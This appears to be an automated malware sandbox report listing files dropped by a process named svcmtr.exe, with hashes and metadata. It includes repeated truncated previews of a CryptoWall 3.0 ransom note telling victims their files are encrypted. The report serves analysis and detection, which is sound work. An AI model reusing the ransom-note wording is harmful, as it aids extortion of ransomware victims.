                                                                                                                          MD5:D3D62C72D54F23ABE7C8227EA1667C03
                                                                                                                          SHA1:DB8C07BC3E6DFF6407DF78CE1670370CB8BB5E3A
                                                                                                                          SHA-256:2FB614D86EE203C18B0EDF974BD4EE5D930667925CFCF08E0E1DA02D57644753
                                                                                                                          SHA-512:1B831BC9F1B4086B11884F45F1ACB5800B9ED3DB3E81F85CF5BDF49CE8C7EB0590934382BB813E84375F8DBCD33323D5621082BFD6061AAB3F984D70E851B035
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1326
                                                                                                                          Entropy (8bit):7.632306020627354
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S20ol/SD89LwUsXZKZnqvC4Uauzp1Pc1iXktc8sL8:c+9U40oDgJD89LKXZKZ2Ya4YZL
                                                                                                                          MD5:692DBD5C5850433802A6A799053D6DD4
                                                                                                                          SHA1:B8EC234BDF74EFF7E51C98CCCE7FE1E66C65014D
                                                                                                                          SHA-256:8B5CB524F2FFF726E9031EE36A8D90C35F0ABF743943BC8B457D9798BD58E268
                                                                                                                          SHA-512:1199C7ADCCE8D35007A1D27B2043DFD6D16781B9623204D37802855366C3AFDC24F7BDD21B6F5AEE7D71A3891B5E8EEC2106CD5A96A3BFB7C2EBF3B40864D7D0
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1070
                                                                                                                          Entropy (8bit):7.439829461309493
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rNcKSz8AREnt0zmf105Hplv2jQ2:c+9U40oDgrKSOniHNYQ2
                                                                                                                          MD5:2719BA1B78902F26E74ED99A917C2C76
                                                                                                                          SHA1:59916636C02BBBC639C7B9E19766A63BFBBF96EA
                                                                                                                          SHA-256:777F5EA7ED4C2B28F24634A7ACDEBC531E69D9E1CF109A6703D61ED6E7A7941B
                                                                                                                          SHA-512:8C6B3C6159D532DCF81FD2AE8EF7A19139B571DCA8A4C28E4CD54D3399A3B3D70C288E1C4B188C55DCF069449100B5D132718C362D1D586B3F45AEAA8230A7A3
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2526
                                                                                                                          Entropy (8bit):7.845814175974683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgAwdm0owiej8XXk6MaeUXTpHVqCzVHiNVhDLjkGyrzwNxhuB:cztoDgdmoRj8XxMaeUzqGVHi/hHIVCxg
                                                                                                                          MD5:2475952EFF1B57B7538306162B3D17C6
                                                                                                                          SHA1:CFED4468ACD0CA441DC0E2480266D87282E76948
                                                                                                                          SHA-256:2C9133983967747C64B7C91A1EDF202EB40688E13DD116CA623E2B673E37E74B
                                                                                                                          SHA-512:DCE8FD29254F80C834F5F918E64A1D0287940BF626BCE7BF8363D1565726D09FC97682C1AB2BF643692F23E2806B1D6730D3865A81DB51B88ED663113BB78026
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2206
                                                                                                                          Entropy (8bit):7.811394082974455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg/lOJo9Ux6ZiLkyHNE4nemQiiSA0uQzDkoqqQLgp:cztoDJoK6ZiwQRe/idhlRLp
                                                                                                                          MD5:ED706464FBFDD3A0FAFAE99C6EBAE4A7
                                                                                                                          SHA1:3CBA12BBBDE44A14E0156F9017E1AA3A24AE093B
                                                                                                                          SHA-256:29DCBDC12E4F7328B1C12CBF1CA42FAACF76950ED6E151D233A2B65744B54097
                                                                                                                          SHA-512:8C8CC2B203265758890B33A20BB6502040CE8487CF12F7ED5AE5989E01A4BE78E7EA3B805DCAB36A9F637BD9DC5EF6196303FCF1BFD395E0415E06140D8C6BEB
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3054
                                                                                                                          Entropy (8bit):7.882035769238676
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDghoKRLDQfckwMegx/K1tPxdXMsOIUJG90e1g7fEJr4DlEivHnYWySGfF:cztoDFKNGcL5XMsOIUJWnkEJr4DlJvHE
                                                                                                                          MD5:288089D43665B03B7959CC608CE96812
                                                                                                                          SHA1:4BAD023B9914A6396FF13A7D820B41C5C9BB307C
                                                                                                                          SHA-256:FB36814F65F4CD05AD8A76EDE901598C5D52EA27C0432D933B45306A8BEC1307
                                                                                                                          SHA-512:A21BC58BFA91309CDD0D945695EEB2C9108EB6AD78A749C30C134E1514EA6E703DBC6A5EBCFD1B67F8EE3291309221C636CBFBE129A9A5B1321280B785704F60
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.828955828099153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgsrA0DT48h5XWzYTwY7GTX4A/8F2F3qxF9sJtxpatfDV:cztoDb5485mY6TX40qxF9sJFat7V
                                                                                                                          MD5:C20BA25A277E3D9F2F9D964DD56E7D87
                                                                                                                          SHA1:50DF048E1C15682E64B50BFE2ABC477ECD373ECA
                                                                                                                          SHA-256:6F652679A8DCFE9889AC1E2DB7E392ED3F84B11F4013503B5D5729F59FBF68AE
                                                                                                                          SHA-512:D7D6A4B6B1A62D65E835BDB430791D9658830982FF212B4AF1F8B4E62E11BC9CFCFB7F2818C8AD10461E5BDEADA68A9C1833206CBD46D3E139FBB1F1BEC813BC
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1598
                                                                                                                          Entropy (8bit):7.672650237291229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgS06PPEszf+8yAdHUZ2bsJLJ0+:cztoDbRP8szfdyAy4sJLJd
                                                                                                                          MD5:6165F5FEB5DBC5DE57A8623A911C15E6
                                                                                                                          SHA1:DEE80FE2675BBEDA009F68F38F32EE84A9BE6644
                                                                                                                          SHA-256:3C20AC46B1C9E23D0871454838B49504564B0597F45342E8647A3C531CB3E730
                                                                                                                          SHA-512:F4FEF9FE32FD8C7895F4218B8EBDAC6B1171A58A8489A244A22316BB4DEBA2BFC487744E227443DCD1F36D2D6DD5A767F7637F99860C4DE210B277AFF3195978
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3118
                                                                                                                          Entropy (8bit):7.882394875701561
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDFXarlQu5Lrui+4cYMp2juOgvcI9RN:GoGQu5l+rYBjuOgvcIN
                                                                                                                          MD5:FC0CEC71A03C0C9BFD2FC5553215E3EE
                                                                                                                          SHA1:8FEED1414E442F4C2BC5B48D3D0CFA55D2AFDBAD
                                                                                                                          SHA-256:B7BF6060B1889992A130D14F6CAB106A9B74AA9B6CAEB59D436F47565B51CB41
                                                                                                                          SHA-512:0D3993C99FE0DC87E3AF819485BAEC175EF498EF96AE53A6EAD9D22009D374723102F872C80B90A390D84F6F067F67DE0D91D02648491B35224FEE264AE265AD
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5742
                                                                                                                          Entropy (8bit):7.949931290360847
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDFSagknmNrVK23jMIvzXaYJhkx8tuR60YeKjFSV2u/1E47Pn8eqz3Ia6N3P:GoZtmNrE23jLvnbjt0YeKj0VO4r8/UP
                                                                                                                          MD5:17C2FE3D4DB92B74C7357C37DF75F751
                                                                                                                          SHA1:29575A8A49ED58124FFF938A00364E361ECF1032
                                                                                                                          SHA-256:48B20B65D6F275EBD217A948BE33824BA24F5796B2D25A59A2485F140BB30DE3
                                                                                                                          SHA-512:7869041F7566E143EF04451CA1957B410615704F712CED8A6A7ECEE24F1F567722CCAF5A4CF47AC7C4379A1F9FA06AF7395412AC13F64E8F96F13ABFCF1C0DB5
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3358
                                                                                                                          Entropy (8bit):7.889410827723681
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDglaSYqo2lZbfkyhlfoUW+4HVIDj5PXgtOVM5NjCWDUGgyoFEwsPBlYOB:cztoD/qabE4+314eWwpytLXYMmx6
                                                                                                                          MD5:53F234C7D83A6716C5688AD4125CAC10
                                                                                                                          SHA1:2B53DC77E590D17DA70838B3A8568F7B28B371DD
                                                                                                                          SHA-256:985BCFDB2B27879F0A69C836246FF5059E7D10D990A874A0B4FE8F52C2FB0691
                                                                                                                          SHA-512:8D7661A9CF5C7F37B38594FB693901A5B8049F9E373EBB37ED40ADF184F0B4C54AA3976069EDB47E53476DED1B4B961A31F7B397515B42E36C81930E1853057D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7950
                                                                                                                          Entropy (8bit):7.963624534895654
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoGMJO30MWyOAvgTTu7AIOAY9iqmDURUr6VF:GEOEzyXGy7I9PmDUCuVF
                                                                                                                          MD5:EF8861DA734425161C41CD212CFDBBC4
                                                                                                                          SHA1:C4C7CE8D9D3900470EF4CC4CA438ADACEFC860C6
                                                                                                                          SHA-256:1AF67539332BBFED337B89F97DFC6188D65680515E911ADD41CC7EAE23953035
                                                                                                                          SHA-512:C27E1835537B0DE0B8EC820108BEC58C271C914F536CE6A31E6DC0D0F944B4CB4FF1FE3C9872338B97EA7B0EF3465E9286BDA0064490D5EA651385D0B6DD7D91
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1022
                                                                                                                          Entropy (8bit):7.407610323035598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2NRSSN4vNBY2znREGDsktrsfQvA1ypJXsL3:c+9U40oDgLzbREGIQeQCaJXsD
                                                                                                                          MD5:21EBE79E1EEB09CFDA3FE9C7D1D9CD0D
                                                                                                                          SHA1:92C4C4ED283624A3815B46C5DA3FB6BC77BFC910
                                                                                                                          SHA-256:D003672B2774B9BAE6CF650BE1B34F4A322B4AF130B09FC1C27BC783726F32E0
                                                                                                                          SHA-512:6091191A778793FD47BF2ECC29BAE9A13987DAB29A517F8F09C00E1E7CB0922917CA6B2CEFEBB23C3A458A234460C82ACA60EB830F58AC5DBCF657E86D8BCE27
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1118
                                                                                                                          Entropy (8bit):7.4994433044768725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CQ2iXBo+JlxaC9LJ1bts3twhPd:c+9U40oDgrYBTJlxFXh1
                                                                                                                          MD5:23B2577AA073F3178AC179CA71DCBBAE
                                                                                                                          SHA1:5CBBB513F3721F5180E274FDF220930CDA7D1F00
                                                                                                                          SHA-256:A8FA0FE61505C25A40EE9BF054E7AA320D9C405DE3EDFF2ACC13820D7C4EA97B
                                                                                                                          SHA-512:719EA18589485172B5C47EB66D5B0451E8D9C619CDA95E1AA4B09B08B3A82BE4C69BD930604A8AEE77BA8EE4205FDC16FE90E7A00E20884E0CAC87EE54363595
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2686
                                                                                                                          Entropy (8bit):7.841598417414712
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgkRSxWKzQVOIpAEOxGErobhNlhkGa0jFEYSSdPYcfCk:cztoDFEQVOIpLOxGECNXNC4hKk
                                                                                                                          MD5:6CDC1F936EE5A8D64933BC288E268558
                                                                                                                          SHA1:917EF76A1DD35967DE19229DF2EC617E112159D4
                                                                                                                          SHA-256:BE4FB97BCC6514231334D5B242A07B6587C68D663780151BBF66CA3C0A3366AB
                                                                                                                          SHA-512:58189D865F5F99D9700A3EBE0046D4B7A18831B9B84C0BF5B5DEE76245A63ED67CF24F58AD6F0EB9DF417D3185CF89285E75D85CE67B8AD94C6533FF94E5162E
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9614
                                                                                                                          Entropy (8bit):7.970616820994937
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GozxK7sNJaudsUnL0Kt+fdt8O/8INsWy1AjmHu27eYeKecv6M3iQsE:GIxK7uksshKEfQA8ki1AqLAhMyQB
                                                                                                                          MD5:F1CCC967A9ACAE79D40D5644EF8F3FB5
                                                                                                                          SHA1:666BD13464EC22D8A3B142C71C7A14962CE3B33F
                                                                                                                          SHA-256:CA7ABD4980F44616E8285889E58B731DA9A75A36E7EB0C73BE1CAB25AF612757
                                                                                                                          SHA-512:FF79D1C296D061222626731EDF841EE0E19A3BB4E50819894DC4BFCA72C24296935BE03ACD35EDF6EC91157743DA0FF40E0A05628625ED4012DDA0B6D1E94BEF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1294
                                                                                                                          Entropy (8bit):7.574045469388257
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2H/LYZo0LOOi+tMeBKMx10CbUfoh4xHWvHcaaGKEMG:c+9U40oDg48Zo6Qu1zUo4B0HcaLKe
                                                                                                                          MD5:BCD139CF463E642A5EB833BDAE3C16FC
                                                                                                                          SHA1:680FC6656B480FE846176760B1835ECE071B8A3D
                                                                                                                          SHA-256:1CC86DEEFB47B5FC17B40FCFBCE4B5B9FAA7E97C6BB172CA97002C8800D99D44
                                                                                                                          SHA-512:1F672C2AC5822978DAFE3A51AABA4E5C35BB25735C800FE445917C154346A0910916982CDA39E1FAAE8ADB5316E15B4FB3F44BBA15F44CAE8277B0C53285ED79
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15262
                                                                                                                          Entropy (8bit):7.986557814034618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GxnevkPuEdz/XWY2Z/0zFz7XtPgpARc2pItUUxfZkJ5T:GWkGEpPWYiC5Pgeq0URRwT
